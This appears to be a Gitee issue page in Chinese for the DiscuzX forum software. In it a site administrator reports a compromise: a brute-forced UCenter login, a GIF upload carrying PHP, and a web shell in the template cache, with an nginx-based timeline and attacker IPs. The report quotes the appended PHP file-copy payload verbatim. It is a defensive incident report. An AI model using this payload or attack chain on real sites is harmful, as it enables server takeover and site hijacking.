登录
注册
开源
企业版
高校版
搜索
帮助中心
使用条款
关于我们
开源
企业版
高校版
私有云
模力方舟
登录
注册
代码拉取完成,页面将自动刷新
开源项目
>
建站系统
>
BBS论坛/问答
&&
捐赠
捐赠前请先登录
取消
前往登录
扫描微信二维码支付
取消
支付完成
支付提示
将跳转至支付宝完成支付
确定
取消
Watch
不关注
关注所有动态
仅关注版本发行动态
关注但不提醒动态
897
Star
3.8K
Fork
1.5K
Discuz
/
DiscuzX
代码
Issues
105
Pull Requests
1
Wiki
统计
流水线
服务
PHPDoc
质量分析
Jenkins for Gitee
腾讯云托管
腾讯云 Serverless
悬镜安全
阿里云 SAE
Codeblitz
SBOM
我知道了,不再自动展开
更新失败,请稍后重试!
移除标识
内容风险标识
本任务被
标识为内容中包含有代码安全 Bug 、隐私泄露等敏感信息,仓库外成员不可访问
uc_server 被python脚本跑字典导致爆库
已完成
#I17GH0
PureCC
创建于
2019-12-27 23:26
今天发现管理员后台登陆不上去, 仔细检查后, 在`config_global.php`发现被插入恶意代码, 研究后暂时猜测是uc_server/被爆破了, 并未使用简单密码, 含有大小写和数字的那种密码. 从发现到现在已经将近24小时没睡觉了, 一直在处理后续工作. 整站大约2-4个月前刚做过一次全面更新, X3.4. 网站被挂马, 被开了shell权限, 被用于搜索引擎劫持, 推广非法信息. 已经找到疑似入侵者真实IP, 准备回国去当地报网警了. 目前不了解为什么uc_server密码错误锁定机制没有被触发, (手动使用浏览器输入错误密码会被锁定)也不知道是因为我们没安装某些补丁, 还是有人已经破解了防爆破机制, 目前所有信息均为猜测, 根据nginx log来看, 整个入侵过程, 从第一次成功登录UCenter到使用模板缓存挂的网马, 不超过15分钟. 目前唯一的未知, 是入侵者如何提前预知它上传的shell的模板缓存文件的文件名,`data/template/14_11_common_header_forum_case.tpl.php`. 最开始以为是某个恶意模板通过自己自行生成的文件(基于data/template文件夹特性猜测), 但近期除了从dismall购买过一个正规渠道的手机模板之外, 并未有其他操作, 希望懂的大神可以提供入侵和防御思路. 以下是部分nginx被爆破的log, 以及个人根据nginx log分析出来的入侵者行踪.  猜测入侵流程: - 爆破uc_server/admin.php - 修改随机用户权限(这里选择的是一个VIP权限用户), 不知道为什么不直接使用管理员账号操作. - 上传恶意gif, 尾部含有php的copy函数 - 上传第二个恶意gif(入侵者自行删除, 不清楚内容) - 通过未知手段, 在./data/template文件夹生成网马shell - 取得shell权限. 个人猜测的理论上来讲, uc_server的爆破应该无用, 或者不是必需品, 入侵者已经有能力上传gif(全站没有限制gif上传), 没有必要再需要取得ucenter创始人权限. 目前不知道爆破uc_server的目的, 也不知道爆破uc_server是否为前置条件. ``` 120.220.44.82 山东真实IP 202.57.44.43 菲律宾代理 119.23.220.45 杭州阿里巴巴 阿里云 Python爆库机器人 之前bot扫描时间12/16号开始, 之前可能还有 2019-12-23 23:34:45 第一次成功登录UC_CENTER 2019-12-23 23:35:52 第一次找到UID 1960用户profile 山东IP 2019-12-23 23:36:13 确认已经登录进UC_SERVER 修改1960用户信息 2019-12-23 23:36:54 第一次回帖操作 上传misc.php swfupload gif文件 2019-12-23 23:37:02 第一次命中附件gif文件 山东IP: data/attachment/forum/201912/24/023654yy13wckyioz91bko.gif 文件尾部含有恶意代码: <?= var_dump/**/(copy/**/($_POST[1],$_POST[2])); 2019-12-23 23:37:19 后台UC Center 添加app操作 2019-12-23 23:39:13 第二次回帖操作, 后被修改掉 2019-12-23 23:39:18 疑似第二次上传操作 2019-12-23 23:39:23 疑似访问第二次上传的文件, 已自行删除: data/attachment/forum/201912/24/023918ooy4454wtztqo8zq.gif 2019-12-23 23:39:47 后台UC Center 再次添加app操作 2019-12-23 23:40:32 第一次直接命中模板缓存网马: /data/template/14_11_common_header_forum_case.tpl.php 2019-12-23 23:41:21 删除第二次上传的文件 2019-12-23 23:43:00 – 23:46:00 浏览部分文件夹 2019-12-23 23:49:01更换使用菲律宾IP命中模板缓存网马 ```
今天发现管理员后台登陆不上去, 仔细检查后, 在`config_global.php`发现被插入恶意代码, 研究后暂时猜测是uc_server/被爆破了, 并未使用简单密码, 含有大小写和数字的那种密码. 从发现到现在已经将近24小时没睡觉了, 一直在处理后续工作. 整站大约2-4个月前刚做过一次全面更新, X3.4. 网站被挂马, 被开了shell权限, 被用于搜索引擎劫持, 推广非法信息. 已经找到疑似入侵者真实IP, 准备回国去当地报网警了. 目前不了解为什么uc_server密码错误锁定机制没有被触发, (手动使用浏览器输入错误密码会被锁定)也不知道是因为我们没安装某些补丁, 还是有人已经破解了防爆破机制, 目前所有信息均为猜测, 根据nginx log来看, 整个入侵过程, 从第一次成功登录UCenter到使用模板缓存挂的网马, 不超过15分钟. 目前唯一的未知, 是入侵者如何提前预知它上传的shell的模板缓存文件的文件名,`data/template/14_11_common_header_forum_case.tpl.php`. 最开始以为是某个恶意模板通过自己自行生成的文件(基于data/template文件夹特性猜测), 但近期除了从dismall购买过一个正规渠道的手机模板之外, 并未有其他操作, 希望懂的大神可以提供入侵和防御思路. 以下是部分nginx被爆破的log, 以及个人根据nginx log分析出来的入侵者行踪.  猜测入侵流程: - 爆破uc_server/admin.php - 修改随机用户权限(这里选择的是一个VIP权限用户), 不知道为什么不直接使用管理员账号操作. - 上传恶意gif, 尾部含有php的copy函数 - 上传第二个恶意gif(入侵者自行删除, 不清楚内容) - 通过未知手段, 在./data/template文件夹生成网马shell - 取得shell权限. 个人猜测的理论上来讲, uc_server的爆破应该无用, 或者不是必需品, 入侵者已经有能力上传gif(全站没有限制gif上传), 没有必要再需要取得ucenter创始人权限. 目前不知道爆破uc_server的目的, 也不知道爆破uc_server是否为前置条件. ``` 120.220.44.82 山东真实IP 202.57.44.43 菲律宾代理 119.23.220.45 杭州阿里巴巴 阿里云 Python爆库机器人 之前bot扫描时间12/16号开始, 之前可能还有 2019-12-23 23:34:45 第一次成功登录UC_CENTER 2019-12-23 23:35:52 第一次找到UID 1960用户profile 山东IP 2019-12-23 23:36:13 确认已经登录进UC_SERVER 修改1960用户信息 2019-12-23 23:36:54 第一次回帖操作 上传misc.php swfupload gif文件 2019-12-23 23:37:02 第一次命中附件gif文件 山东IP: data/attachment/forum/201912/24/023654yy13wckyioz91bko.gif 文件尾部含有恶意代码: <?= var_dump/**/(copy/**/($_POST[1],$_POST[2])); 2019-12-23 23:37:19 后台UC Center 添加app操作 2019-12-23 23:39:13 第二次回帖操作, 后被修改掉 2019-12-23 23:39:18 疑似第二次上传操作 2019-12-23 23:39:23 疑似访问第二次上传的文件, 已自行删除: data/attachment/forum/201912/24/023918ooy4454wtztqo8zq.gif 2019-12-23 23:39:47 后台UC Center 再次添加app操作 2019-12-23 23:40:32 第一次直接命中模板缓存网马: /data/template/14_11_common_header_forum_case.tpl.php 2019-12-23 23:41:21 删除第二次上传的文件 2019-12-23 23:43:00 – 23:46:00 浏览部分文件夹 2019-12-23 23:49:01更换使用菲律宾IP命中模板缓存网马 ```
评论 (
10
)
登录
后才可以发表评论
状态
已完成
待办的
进行中
已完成
已关闭
负责人
未设置
标签
未设置
标签管理
里程碑
未关联里程碑
未关联里程碑
Pull Requests
未关联
未关联
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
未关联
分支 (3)
标签 (38)
v3.5
MitFrame
master
v3.5-20250901
20250205
20240520
v3.5-20231221
v3.5-20231001
v3.5-20230726
v3.5-20230520
v3.4-20230520
v3.5-20230316
v3.4-20230315
v3.5-20230210
v3.4-20230210
v3.5-20221231
v3.4-20221231
v3.5-20221221
v3.4-20221220
v3.4-20221111
v3.5-Beta-20220910
v3.4-20220811
v3.4-20220518
v3.4-20220406
v3.4-20220131
v3.5-Alpha-20220131
v3.5-Alpha-20220107
v3.5-Alpha-20211231
v3.4-20211231
v3.4-20211124
v3.4-20211022
v3.4-20210926
v3.4-20210917
v3.4-20210816
v3.4-20210630
v3.4-20210520
v3.4-20210320
v3.4-20210119
v3.4-20200818
v3.4-20191201
v3.4-20190917
开始日期 - 截止日期
-
置顶选项
不置顶
置顶等级:高
置顶等级:中
置顶等级:低
优先级
不指定
严重
主要
次要
不重要
参与者(1)
PHP
1
https://gitee.com/Discuz/DiscuzX.git
git@gitee.com:Discuz/DiscuzX.git
Discuz
DiscuzX
DiscuzX
点此查找更多帮助
搜索帮助
Git 命令在线学习
如何在 Gitee 导入 GitHub 仓库
Git 仓库基础操作
企业版和社区版功能对比
SSH 公钥设置
如何处理代码冲突
仓库体积过大,如何减小?
如何找回被删除的仓库数据
Gitee 产品配额说明
GitHub仓库快速导入Gitee及同步更新
什么是 Release(发行版)
将 PHP 项目自动发布到 packagist.org
评论
仓库举报
回到顶部
登录提示
该操作需登录 Gitee 帐号,请先登录后再操作。
立即登录
没有帐号,去注册
